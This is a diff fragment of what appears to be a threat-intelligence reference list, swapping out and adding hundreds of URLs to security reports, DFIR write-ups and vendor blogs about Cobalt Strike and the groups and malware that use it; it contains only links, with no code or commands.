"https://blog.group-ib.com/apt41-world-tour-2021", - "https://www.youtube.com/watch?v=C733AyPzkoc", - "https://blog.group-ib.com/opera1er-apt", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://twitter.com/felixw3000/status/1521816045769662468", - "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", - "https://malware-traffic-analysis.net/2021/09/29/index.html", - "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", - "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", - "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/", - "https://www.mandiant.com/media/12596/download", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", - "https://explore.group-ib.com/htct/hi-tech_crime_2018", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", - "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", - "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", - "https://attack.mitre.org/groups/G0096", - "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/", - "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", - "https://www.macnica.net/file/mpression_automobile.pdf", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a", - "https://twitter.com/VK_Intel/status/1294320579311435776", - "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", - "https://thedfirreport.com/2021/05/12/conti-ransomware/", - "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/", - "https://www.prevailion.com/what-wicked-webs-we-unweave/", - "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/", - "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", - "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", - "https://github.com/Apr4h/CobaltStrikeScan", - "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/", - "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", - "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI", - "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", - "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", - "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", - "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/", - "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf", - "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", - "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", - "https://blog.cobaltstrike.com/", - "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", - "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/", - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", + "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/", + "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://blog.group-ib.com/REvil_RaaS", + "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://web.br.de/interaktiv/ocean-lotus/en/", + "https://zero.bs/cobaltstrike-beacons-analyzed.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", - "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/", - "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/", - "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", - "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/", - "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654", - "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", - "https://boschko.ca/cobalt-strike-process-injection/", - "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads", - "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", - "https://www.youtube.com/watch?v=borfuQGrB8g", - "https://cert.gov.ua/article/339662", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", - "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://netresec.com/?b=214d7ff", + "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", + "https://malware-traffic-analysis.net/2021/09/29/index.html", + "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/", + "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", + "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/", + "https://blog.zsec.uk/cobalt-strike-profiles/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", + "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/", + "https://www.mandiant.com/resources/apt41-us-state-governments", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", + "https://blog.group-ib.com/opera1er-apt", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://blog.group-ib.com/colunmtk_apt41", + "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/", + "https://twitter.com/vikas891/status/1385306823662587905", + "https://blog.cobaltstrike.com/", + "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://twitter.com/cglyer/status/1480742363991580674", + "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", + "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux", + "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", + "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://www.youtube.com/watch?v=C733AyPzkoc", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/", + "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", + "https://isc.sans.edu/diary/rss/28934", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://embee-research.ghost.io/shodan-censys-queries/", + "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", - "https://redcanary.com/blog/gootloader", - "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/", + "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/", + "https://www.qurium.org/alerts/targeted-malware-against-crph/", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", + "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", + "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/", + "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf", + "https://github.com/Apr4h/CobaltStrikeScan", + "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", + "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/", + "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks", + "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", + "https://thedfirreport.com/2022/03/07/2021-year-in-review/", + "https://explore.group-ib.com/htct/hi-tech_crime_2018", + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns", + "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", + "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42", + "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting", + "https://attack.mitre.org/groups/G0096", + "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", + "https://isc.sans.edu/diary/rss/28448", + "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", + "https://www.prevailion.com/what-wicked-webs-we-unweave/", + "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications", + "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a", + "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", + "https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage", + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://asec.ahnlab.com/ko/19640/", + "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7", + "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/", + "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.youtube.com/watch?v=y65hmcLIWDY", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654", + "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", + "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", + "https://twitter.com/Unit42_Intel/status/1458113934024757256", + "https://isc.sans.edu/diary/rss/28664", + "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", + "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://blog.talosintelligence.com/2021/05/ctir-case-study.html", + "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://www.mandiant.com/resources/defining-cobalt-strike-components", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/", + "https://www.inde.nz/blog/different-kind-of-zoombomb", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://www.youtube.com/watch?v=FC9ARZIZglI", + "https://thedfirreport.com/2022/04/25/quantum-ransomware/", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html", + "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", + "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion", + "https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", + "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear", + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", + "https://d01a.github.io/syscalls/", + "https://securelist.com/apt-luminousmoth/103332/", + "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", + "https://boschko.ca/cobalt-strike-process-injection/", + "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", + "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://twitter.com/RedDrip7/status/1402640362972147717?s=20", + "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware", + "https://twitter.com/MBThreatIntel/status/1412518446013812737", + "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://skyblue.team/posts/scanning-virustotal-firehose/", + "https://isc.sans.edu/diary/rss/27176", + "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/", + "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://www.mandiant.com/resources/unc2452-merged-into-apt29", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://cert.gov.ua/article/339662", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://twitter.com/felixw3000/status/1521816045769662468", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang", + "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a", + "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/", + "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/", + "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", + "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes", + "https://cert.gov.ua/article/703548", + "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html", + "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", + "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf", + "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", + "https://www.mandiant.com/media/10916/download", + "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups", + "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2", + "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", + "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", + "https://blogs.blackberry.com/en/2022/01/log4u-shell4me", + "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + 